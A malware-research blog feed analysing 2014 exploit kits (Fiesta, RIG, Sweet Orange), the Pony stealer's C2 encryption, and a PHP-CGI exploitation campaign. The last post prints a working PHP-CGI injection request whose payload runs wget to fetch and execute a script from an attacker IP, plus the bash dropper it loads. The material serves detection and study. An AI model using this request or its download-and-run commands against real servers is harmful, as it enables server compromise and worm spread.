<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQI77CVHn9EneBh_eesN8S4STi4G98y-LLjykQ57EAlBA3HpNL3rval5OeQr03krZTvtT8lNA294nBcOEO4TO3zrtv5C4kdsUn6LWZXGEvbxkvFcWeWg-CDrpz4CG6JRNDklEGp3U8WfY/s1600/fiesta_landingpage_key3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQI77CVHn9EneBh_eesN8S4STi4G98y-LLjykQ57EAlBA3HpNL3rval5OeQr03krZTvtT8lNA294nBcOEO4TO3zrtv5C4kdsUn6LWZXGEvbxkvFcWeWg-CDrpz4CG6JRNDklEGp3U8WfY/s1600/fiesta_landingpage_key3.png" height="146" width="640" /></a></div>
<br />
Example two and three is using the same key but the rest differs, for example function and variable names, the key however stays the same. <br />
<br />
The same key will also be used for deobfuscating the IE exploit.<br />
<br />
<h4>
Resources</h4>
This script can be used to decode the strings in the landingpage [<a href="http://pastebin.com/T6D9nv5Z">pastebin</a>].<br />
More examples of Fiesta can be found from <a href="http://malware-traffic-analysis.net/">malware-traffic-analysis.net</a><br />
<br />
<i> </i><br />
<i> </i><br />
<i> </i><br />
<i> </i>Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-9190023388362883882014-07-25T04:27:00.000-07:002014-07-25T04:32:02.039-07:00Landingpages bites the dust - RIG<h4 style="height: 0px;">
</h4>
<h4 style="height: 0px;">
</h4>
<h4 style="height: 0px;">
Basic structure </h4>
<div>
<br />
RIG have adopted a "top-to-bottom"-approach when executing it's code. The page starts with checks for installed anti-virus before moving on to deobfuscate and execute exploits (more on this in the next section). Sample used in the post can be found <a href="http://pastebin.com/t2wE7UM3">[raw]</a> and <a href="http://pastebin.com/HKLn83Uj">[decoded]</a> (exploits).<br />
<br />
The exploits are split up into sections where a portion of the code is concatenated into a long string for each line:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGCv45mDzhoGzBGY9VW66ZhpJUEgjH1KH55orReMuizijWjK9YGUOvpYH3ftqt5dXOHZhtI8se8Aby0SVrMcn6UjT7pHWsFKqguj12s_dt11NJz2XVVPFL1Q9h8YxjWNIK5fnLTJirp1c/s1600/rig_landingpage_concat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGCv45mDzhoGzBGY9VW66ZhpJUEgjH1KH55orReMuizijWjK9YGUOvpYH3ftqt5dXOHZhtI8se8Aby0SVrMcn6UjT7pHWsFKqguj12s_dt11NJz2XVVPFL1Q9h8YxjWNIK5fnLTJirp1c/s1600/rig_landingpage_concat.png" height="320" width="316" /></a></div>
Capture below show the decoding used when the all the portions have been concatenated:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0YXrZGONS_M-4FRgJusrtki11Clgk3cExRuGEFBHSgZmjC3LRCz37otLbTqfz1u49rExTX2NDn20J5XJsIZbqYOpYHQJOYYqEhyriNUd68HQ-EwTiWPtFQSrKQ0rb9sTqbRcw-wnNpnM/s1600/rig_landingpage_deob.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0YXrZGONS_M-4FRgJusrtki11Clgk3cExRuGEFBHSgZmjC3LRCz37otLbTqfz1u49rExTX2NDn20J5XJsIZbqYOpYHQJOYYqEhyriNUd68HQ-EwTiWPtFQSrKQ0rb9sTqbRcw-wnNpnM/s1600/rig_landingpage_deob.png" height="220" width="320" /></a></div>
This pattern repeats for every exploit found in the landingpage.</div>
<br />
<h4>
Client identification</h4>
At the very beginning RIG will check for the presence of Kaspersky and TrendMicro. What's interesting is the code used for checking if they're installed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuef_kAH5x3QqiUwr-lih5aw1RL-mXgdWsfr_9uEQ_eJ19e9uLBDs4tAggzlWzXCyhGJ9AuXMyx7vG8LPkBlotMEOIE7pdmkp7lex5dJ6I0G0t5QPlgojUaKAmb8qJQQD48OnZzcKft0/s1600/rig_landingpage_avcheck.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuef_kAH5x3QqiUwr-lih5aw1RL-mXgdWsfr_9uEQ_eJ19e9uLBDs4tAggzlWzXCyhGJ9AuXMyx7vG8LPkBlotMEOIE7pdmkp7lex5dJ6I0G0t5QPlgojUaKAmb8qJQQD48OnZzcKft0/s1600/rig_landingpage_avcheck.png" height="209" width="640" /></a></div>
<br />
The code above is the exact same code used in the watering-hole attack <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">"Operation Snowman"</a> targeting US military personnel, the only modification is to make the code callable from a loop as it does in the landingpage.<br />
<br />
The code used in Operation Snowman can be seen below, the only difference is that RIG ignores the check for EMET and goes for anti-virus instead.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwvPmN9HfHJMBt2GUqnOsibvjkViQPlm_A2g9BKXVmtGNqdqj_emWixbmqIQFoTIGv_o3qvZgGFgKROhcyWVjFW1fKb6WIIt1YR9OHYLyO0JK5WiTNcxu5QiyV1puXaRPpfNP-5Qq2oU/s1600/rig_landingpage_emet.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYwvPmN9HfHJMBt2GUqnOsibvjkViQPlm_A2g9BKXVmtGNqdqj_emWixbmqIQFoTIGv_o3qvZgGFgKROhcyWVjFW1fKb6WIIt1YR9OHYLyO0JK5WiTNcxu5QiyV1puXaRPpfNP-5Qq2oU/s1600/rig_landingpage_emet.png" height="258" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code from <a href="http://www.blackploit.com/2014/02/0-day-en-internet-explorer-10-cve-2014.html">Blackploit</a></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
Since this check utilizes Microsoft.XMLDOM, it means that only users of Internet Explorer will exploitable. Any other browser will fail the check for anti-virus as the function itself will fail. If it's found to have none of the blacklisted anti-virus installed it will do a function re-assignment of <b>String</b> which is later used in calling <b>String.fromCharCode</b> to decode each exploit section:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-oQdPKGW6_lW1gqSk9urGjRWiDhCEMJA2n6CBbh4scikdN1QcgLVZGaoDQ7GCsZ0G08kVdAOLnNH-ipTMg-K08ZeMQmVqLuTIGb79lZJso4a2IYeKIwFQ-EZ1HGdlS6Le8JaX5xQh6EU/s1600/rig_landingpage_reassign.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-oQdPKGW6_lW1gqSk9urGjRWiDhCEMJA2n6CBbh4scikdN1QcgLVZGaoDQ7GCsZ0G08kVdAOLnNH-ipTMg-K08ZeMQmVqLuTIGb79lZJso4a2IYeKIwFQ-EZ1HGdlS6Le8JaX5xQh6EU/s1600/rig_landingpage_reassign.png" height="96" width="640" /></a></div>
<br />
<br />
After each exploit section has been decoded, it's found that no checks are being made for which specific version of the plugins that is installed other than for Adobe Flash:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82V4n2kA-Y60JngidvAMkTPRaYW-PWbQOwFA_9cp04MAUrsjmfRqO0Bjsyuv1TPE_U7oIJwvYkjDq6vDiGUqnk6B6jnF9gRYr9K5C39nGMD_OYDVEHBH620-QKhGHjTVZCxpZjXe5fy0/s1600/rig_landingpage_flash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82V4n2kA-Y60JngidvAMkTPRaYW-PWbQOwFA_9cp04MAUrsjmfRqO0Bjsyuv1TPE_U7oIJwvYkjDq6vDiGUqnk6B6jnF9gRYr9K5C39nGMD_OYDVEHBH620-QKhGHjTVZCxpZjXe5fy0/s1600/rig_landingpage_flash.png" height="224" width="640" /></a></div>
<i>(Each section can be decoded by setting a breakpoint on the line calling <b>appendChild</b> in the landingpage and inspecting the content of the parameter (I used Firefox Debugger in the Web Developer tools)).</i><br />
<br />
<h4>
Detection</h4>
<div>
Much like Fiesta, RIG does change it's obfuscated strings, however, the deobfuscation routine stays the same so it's possible to use almost any line for simple string-matching signature.<br />
<br />
It's also possible, since RIG doesn't obfuscate the AV-detection to trigger on for example<b> c:\\windows\\system32 </b>as there is almost no legitimate reason for calling files from system directory in webpages.</div>
Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-56035238071517194192014-05-25T16:55:00.002-07:002014-06-25T13:22:31.795-07:00Dropnote #2 - Pony changing it's patternAfter the tweet from @malware_traffic I found myself recognizing the callback pattern and thought I would take a look.<br />
<br />
<blockquote class="twitter-tweet" lang="en">
<a href="https://twitter.com/search?q=%23CryptoWall&src=hash">#CryptoWall</a> infection - 2014-05-25 - Angler EK from 192.99.41.165 - denoting.centrixsf[.]com - PCAP/malware/more at: <a href="http://t.co/LdEKOD3q0n">http://t.co/LdEKOD3q0n</a><br />
— Brad (@malware_traffic) <a href="https://twitter.com/malware_traffic/statuses/470649041403928576">May 25, 2014</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script>
<br />
The initial callback after the successful exploitation was a POST-request to<b> 'gate.php' </b>togheter with a few GET-requests for executables, both using HTTP/1.0 as shown below:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU6swJyM3J1I4QwCqUdrYGSjMlW4f8HXm8SXQgFuzZPyIiKj5IfARAEMAe8aDLC2rBlSyXQKJp9jMWNvqSxcVEf6WzLaekaAzuw-s_XnldVA5s7_oxAVNyNnNmQQfAkkfdkoe3F5s9cl8/s1600/post_infectetion_callback.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU6swJyM3J1I4QwCqUdrYGSjMlW4f8HXm8SXQgFuzZPyIiKj5IfARAEMAe8aDLC2rBlSyXQKJp9jMWNvqSxcVEf6WzLaekaAzuw-s_XnldVA5s7_oxAVNyNnNmQQfAkkfdkoe3F5s9cl8/s1600/post_infectetion_callback.png" height="88" width="640" /></a></div>
<br />
The first pattern looks alot like Pony (Pony is well documented on other blogs), however, I was expecting the usual "Microsoft 98" user-agent when inspecting the whole request, but instead I found:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9CvOFCE-mGsxi1qUTwGLOKsQwOXFhd7N1UN59jObDKNjL95Rp2qrSETNBNshwbltUxbviOQfke_NA745wufsQOl1cLyCxqRn9Ce95rj4FRGotn1QLYHBVApguI67lI_Uc3hYCNVgB-X0/s1600/pony_http_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9CvOFCE-mGsxi1qUTwGLOKsQwOXFhd7N1UN59jObDKNjL95Rp2qrSETNBNshwbltUxbviOQfke_NA745wufsQOl1cLyCxqRn9Ce95rj4FRGotn1QLYHBVApguI67lI_Uc3hYCNVgB-X0/s1600/pony_http_request.png" height="259" width="640" /></a></div>
Looking at <a href="https://www.virustotal.com/en/file/801f4ec08b036d4605a902580ab1454e2659d4f940a42a6474ecb5e10bea9b5b/analysis/">Virustotal results,</a> which at the time of writing is 3/52, it's flagged as "Fareit" by ESET and Kaspersky. So now to the interesting part, what is this Pony up to?<br />
<br />
Pony itself is normally around 86kb depending on configuration and the payload itself in this case is 164kb which does suggest that it's either bundled with other malware, heavily modified version of Pony or that it includes alot of junkcode.<br />
<br />
After running the sample under a debugger, setting breakpoints on CreateFileA and CreateFileW, I start finding interesting strings for example the "obfuscated" password used for encryption.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibpvSDdW5rhXizVPTGg9kUuwhaAAXZj9p8y46PL7lU30TFUpJJ0DyhzcCSpJjxV05XxKDeqKdptnRy5U1SzU4vNX-d4-rf49FTkUaEO1nO2mMI_Hh8WGP2bvo7TbGVjzH8rZJRD1X1B9o/s1600/pony_packed_pw.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibpvSDdW5rhXizVPTGg9kUuwhaAAXZj9p8y46PL7lU30TFUpJJ0DyhzcCSpJjxV05XxKDeqKdptnRy5U1SzU4vNX-d4-rf49FTkUaEO1nO2mMI_Hh8WGP2bvo7TbGVjzH8rZJRD1X1B9o/s1600/pony_packed_pw.png" height="124" width="640" /></a></div>
<br />
Just to mention, Pony stores the password it uses for encryption in an "obfuscated" pattern where each character is rotated two steps to the right. And looking at an unpacked version of Pony you'll find that the password is listed just before the callback server.<br />
<br />
The strings above confirm that this is indeed Pony, yet modified. Let's continue with the configuration and encryption.<br />
<br />
By letting Pony run, using the same breakpoints we find several interesting URL's:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8OEN6MGtoAPyEpuY9VAY3nGn24IsTalvmphkRWoELzwiD-1ssEut3c-alF7by2fwZkieD2pNzjVwuODmAMRa2Vv1vWanO_v6BFowvwDe-fAcFUKt7bH4z-_9GpM4Xf8fIEH04ccoxIGY/s1600/pony_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8OEN6MGtoAPyEpuY9VAY3nGn24IsTalvmphkRWoELzwiD-1ssEut3c-alF7by2fwZkieD2pNzjVwuODmAMRa2Vv1vWanO_v6BFowvwDe-fAcFUKt7bH4z-_9GpM4Xf8fIEH04ccoxIGY/s1600/pony_config.png" height="126" width="400" /></a></div>
So now we got the encryption-key, two gates and several executables that will be downloaded. Let's try decrypting the posted data.<br />
<br />
Pony 1.9 used two layers of RC4 to protect the data. The key for the first layer is the first four bytes in the POST-data, the second layer is encrypted with the key found in the binary.<br />
<br />
Decrypting the first layer gives us the familiar string <b>CRYPTED0:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWIXN7wgT0_hWg37BcRy7Tp_VWO9_IAbnv5hCq8D6azuOU8jlVHSEvB_BVH_-f5TSVyhTMxEWBOX83ueqrbcqJMsowYdMVk1vfKxjOIUS60rPeoqo_Fd4Tutqbn35amRE_tlsMqR3cbo/s1600/pony_stage1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWIXN7wgT0_hWg37BcRy7Tp_VWO9_IAbnv5hCq8D6azuOU8jlVHSEvB_BVH_-f5TSVyhTMxEWBOX83ueqrbcqJMsowYdMVk1vfKxjOIUS60rPeoqo_Fd4Tutqbn35amRE_tlsMqR3cbo/s1600/pony_stage1.png" height="292" width="400" /></a></div>
And the second layer using the key 'guardian1' gives us a compressed report:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLjVXs1Ria81eFqOWZnf7to1MiHxQAJWYbm0FsJRx6GPWQsiLCoUmi8GCnVVSFFKeHXRWCTo_ROEP32A_6LolZP3on35W7_n4NX2se2nl_mcJy6LC1D17HeQXRwnF885voAI-pCnUI8yM/s1600/pony_stage2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLjVXs1Ria81eFqOWZnf7to1MiHxQAJWYbm0FsJRx6GPWQsiLCoUmi8GCnVVSFFKeHXRWCTo_ROEP32A_6LolZP3on35W7_n4NX2se2nl_mcJy6LC1D17HeQXRwnF885voAI-pCnUI8yM/s1600/pony_stage2.png" height="276" width="400" /></a></div>
<br />So the encryption-scheme is the same, the change up to this point is simply to be harder to detect together with the ability to steal Bitcoin wallets.<br />
<br />
EDIT: More coverage on the Pony Loader "2.0" on https://blog.damballa.com/archives/2558.<br />
<br />
<pre class="brush">$ date
Mon May 26 01:33:37 CEST 2014
h00p://ourlittleponic.pw/gate.php - Active
h00p://ourponicjunior.pw/gate.php - Domain doesn't resolve
h00p://softwaregamecenter.eu/store/2.exe - Domain doesn't resolve
h00p://softwaregamecenter.eu/store/3.exe - Domain doesn't resolve
h00p://freepicscenter.pw/store/2.exe - <a href="https://www.virustotal.com/en/file/db353becb88a1a728a395f37f3541df79e872d142a7043b026969e91562b1d3e/analysis/1401060980/">27ce89cc842baf51de2e08e2baa50b24</a>
h00p://freepicscenter.pw/store/3.exe - <a href="https://www.virustotal.com/en/file/cf16583886c32dd7f0af39c5019d8d2c5911d3f1004a3dcfec2299c3ce789524/analysis/1401061128/">c1d40e3677ea39be891550f6b03d112d</a>
h00p://freecenterpics.pw/store/2.exe - Domain doesn't resolve
h00p://freecenterpics.pw/store/3.exe - Domain doesn't resolve
h00p://picsfreecenter.pw/store/2.exe - Domain doesn't resolve
h00p://picsfreecenter.pw/store/3.exe - Domain doesn't resolve
</pre>
Also found h00p://freepicscenter.pw/store/1.exe (<a href="https://www.virustotal.com/en/file/bdedd903c00ce40fa480d0d171e509466f2e61fc864574d380af94cff586fbef/analysis/1401061282/">1f195fdf14b2691fcc487f9a474ab443</a>) to be active.Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-12421409215883526592014-02-16T03:32:00.000-08:002014-03-02T08:16:11.254-08:00Dropnote #1 - Sweet Orange EK-rental(?)<i>"Dropnotes" are mainly an "online notebook" to share my notes as I go along</i><br />
<br />
So I was checking my honeypot logs and was noticing C2-traffic towards the domain <b>doubleclick-ads.pw</b>, being a .pw-domain and all, I started investigating the event.<br />
<br />
The traffic seen was POST requests directed to <b>doubleclick-ads.pw/js/order.php</b>, the sample itself was initially found on <b>fatburrito.pw/GameHacks.exe</b> [<a href="https://www.virustotal.com/en/url/1edc22deac2f507b0a4ec594339b08b764281518ae910ed449a54ce3c807d0a9/analysis/">VT</a>].<br />
<br />
As with all C2-traffic, it would be interesting to identify the panel as well as any other artifacts hosted on the server.<br />
<br />
<pre class="brush: js">Resolving doubleclick-ads.pw (doubleclick-ads.pw)... 162.248.166.113
Connecting to doubleclick-ads.pw (doubleclick-ads.pw)|162.248.166.113|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: ./blah.php [following]
--2014-02-16 12:21:03-- h00p://doubleclick-ads.pw/js/blah.php
Connecting to doubleclick-ads.pw (doubleclick-ads.pw)|162.248.166.113|:80... connected.
HTTP request sent, awaiting response... 200 OK
</pre>
This resulted in a picture being showed ment as a "joke" to for example researchers. The pictures are located in <b>doubleclick-ads.pw/js/img/bp/[0-10].jpg</b>. As I was browsing around checking for indexes I was always presented with a random image. Moving on...<br />
<br />
While requesting the root-page, this is when it got interesting as it was loading an iframe:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZDKFkQONzpJtDRHAzdFnJUJFfCRf5koPDNoWA4eInkJQALOF_cReVeZWPMmQm9TMLv60hUvi0BCePdQhFCZosM30TYAWPwEGypl7mnHG1GpJhAIj-eH8NdbDmYY5qFYxOUhe0Tldqp4/s1600/doubleclick-ads.pw_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZDKFkQONzpJtDRHAzdFnJUJFfCRf5koPDNoWA4eInkJQALOF_cReVeZWPMmQm9TMLv60hUvi0BCePdQhFCZosM30TYAWPwEGypl7mnHG1GpJhAIj-eH8NdbDmYY5qFYxOUhe0Tldqp4/s1600/doubleclick-ads.pw_landing.png" height="128" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Which lead to yet another iframe:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO4EyG_52o_6EnQqmWz9vIKfpM7XqLaMclrqpED08Mg0lA12dVRCnaux2MpLDPCbNrRY_gFzH0mkKibiyr3U6N_x80QJGbXqpqhaP9k8HMzjAullws-ATHUftUSoE_3T01eM6DU-qsPI/s1600/xxxpass.info_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO4EyG_52o_6EnQqmWz9vIKfpM7XqLaMclrqpED08Mg0lA12dVRCnaux2MpLDPCbNrRY_gFzH0mkKibiyr3U6N_x80QJGbXqpqhaP9k8HMzjAullws-ATHUftUSoE_3T01eM6DU-qsPI/s1600/xxxpass.info_landing.png" height="202" width="640" /></a></div>
A few things to note regarding the above shots. All of the pages is being reported as malicious, including the last one which points to Sweet Orange Exploit Kit (<a href="http://malware.dontneedcoffee.com/2013/12/cve-2013-5329-or-cve-2013-5330-or.html">same pattern as published by @kafeine</a>)<br />
The reason why I wanted to highlight the URL is due to the digit '/spot<b>8</b>/', this speaks "There is more here!" to me so I started changing the numbers and found that 1-9 are valid folders and all generated an iframe which pointed to Sweet Orange (number 9 generated two iframes, same domain, but different URL's).<br />
<br />
Searching <a href="http://urlquery.net/search.php?q=xxxpass.info&type=string&start=2014-02-01&end=2014-02-16&max=50">urlquery</a> revealed another pattern <b>xxxpass.info/spota/index.php</b> which generated results(!):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNSNJpbIYrd8bElCWpZ2j6Dx6ej5BtWeqabtPA5TU5Z9w2umRwtSMSuyHxZcLjVv12pWLI4iV1FJjPP0G3DGsTa8R2_ellLFcrYe67I-8W0CzogDEHO46KrAPLemJ2TZYSXXNhnpa1kYI/s1600/xxxpass.info_spota.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNSNJpbIYrd8bElCWpZ2j6Dx6ej5BtWeqabtPA5TU5Z9w2umRwtSMSuyHxZcLjVv12pWLI4iV1FJjPP0G3DGsTa8R2_ellLFcrYe67I-8W0CzogDEHO46KrAPLemJ2TZYSXXNhnpa1kYI/s1600/xxxpass.info_spota.png" height="70" width="640" /></a></div>
<br />
Sadly, only '/spot<b>a</b>/' was found to be a valid folder, but as the pattern '/spot<b>X</b>/' repeats, I found that once again 1-9 was valid and allowing directory indexing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO6Bwr8avbK_hVWnHos3PcRyKYVacirwSwgnxkhNjOccTQW_X1gX11mkELyrJWLTGmKcRc6IhoPjq1NKbCc91yrknKKFq3KH73hxggZ44ClAO2YYnYz08lMIKg-UgugOoFQ_D5p3NHMs/s1600/botnethosting.com_ekrental_spot8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXO6Bwr8avbK_hVWnHos3PcRyKYVacirwSwgnxkhNjOccTQW_X1gX11mkELyrJWLTGmKcRc6IhoPjq1NKbCc91yrknKKFq3KH73hxggZ44ClAO2YYnYz08lMIKg-UgugOoFQ_D5p3NHMs/s1600/botnethosting.com_ekrental_spot8.png" height="225" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsJKCSb4Pis_pTYYEsgP_Ixo2JouS90QMvXQEZsLkT8WaYV0Al6lqiWeABywmnkhUyplXXB0ZvmThnM-9YAyMA69oOpcgyzh9GWC4gbXBHQIBYleaLTPeufy77Pam-hZApIPocojF0bU/s1600/botnethosting.com_sweet_orange.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtsJKCSb4Pis_pTYYEsgP_Ixo2JouS90QMvXQEZsLkT8WaYV0Al6lqiWeABywmnkhUyplXXB0ZvmThnM-9YAyMA69oOpcgyzh9GWC4gbXBHQIBYleaLTPeufy77Pam-hZApIPocojF0bU/s1600/botnethosting.com_sweet_orange.png" height="191" width="400" /></a></div>
The files are quite self-explained:<br />
<b>getnewlink.php</b> - Generate a new link and saves it to link.txt.<b> </b><br />
<b>link.txt </b>- Holds the link to where the iframe on xxxpass.info should point.<br />
<b>stats.php </b>- Administration and statistics for Sweet Orange Exploit kit.<br />
<br />
<i><b>Misc</b></i><br />
While I was monitoring the iframes generated I found that a new URI is generated every 60 seconds and a new domain/subdomain is generated every 60 minutes [<a href="http://pastebin.com/VbbwhQxA">Pastebin</a>]<i><b> </b></i><br />
<a href="http://urlquery.net/search.php?q=%28doubleclick-ads\.pw|xxxpass\.info|botnethosting\.com%29&type=regexp&start=2013-12-01&end=2014-02-16&max=50">Hosts involved</a> - urlquery (@urlquery)<br />
<a href="http://www.cybercrime-tracker.net/index.php?search=botnethosting.com">botnethosting.com on cybercrime-tracker.net</a> - Cybercrime-tracker.net (@Xylit0l)<b> </b>Anonymoushttp://www.blogger.com/profile/17658714840850871714noreply@blogger.com0tag:blogger.com,1999:blog-6803479147531086040.post-77038862712004025912014-02-15T04:38:00.001-08:002014-03-02T08:20:47.827-08:00PHP-CGI exploitation never dies?Ever since the vulnerability was discovered in Apache/PHP which allowed for PHP-code to be executed using a simple HTTP POST-request, automated attacks was launched widely which lead to a large number of compromised hosts.<br />
<br />
Those attacks have decreased during the last months, however, one of these automated attacks was particularly interesting due to the fact that the approach used can be categorized as worm-like. Let's go into the whole attack on a higher level before going into the technical part.<br />
<br />
The actor used the exploit released by kingcope [<a href="http://www.exploit-db.com/exploits/29290/">exploit-db</a>] with a modified payload which downloaded a few scripts and binaries which in turn started scanning a random A-block of IPv4 addresses. If a host was found to be running Apache, exploitation attempts would be launched and the whole process starts over. These attacks was first spotted around November 2013.<br />
<br />
<i><span style="font-size: small;"><b>Inner workings</b></span></i><br />
Now for the fun, more interesting part:<br />
One of the exploitation attempts:<br />
<div style="background: black; border: 1px solid grey; color: write; padding: 15px;">
POST /cgi-bin/php.cgi?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1<br />
Content-Length: 82<br />
Host: <i><excluded></i><br />
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25<br />
Connection: close<br />
Content-Type: application/x-www-form-urlencoded<br />
<?php system("wget http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh"); </div>
<br />
The payload is pretty straight forward, download and execute 'sh' which consist of a bash-script:<br />
<pre class="brush: js">#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/shd -O ...i
chmod +x ...i
./...i
cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru
cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr
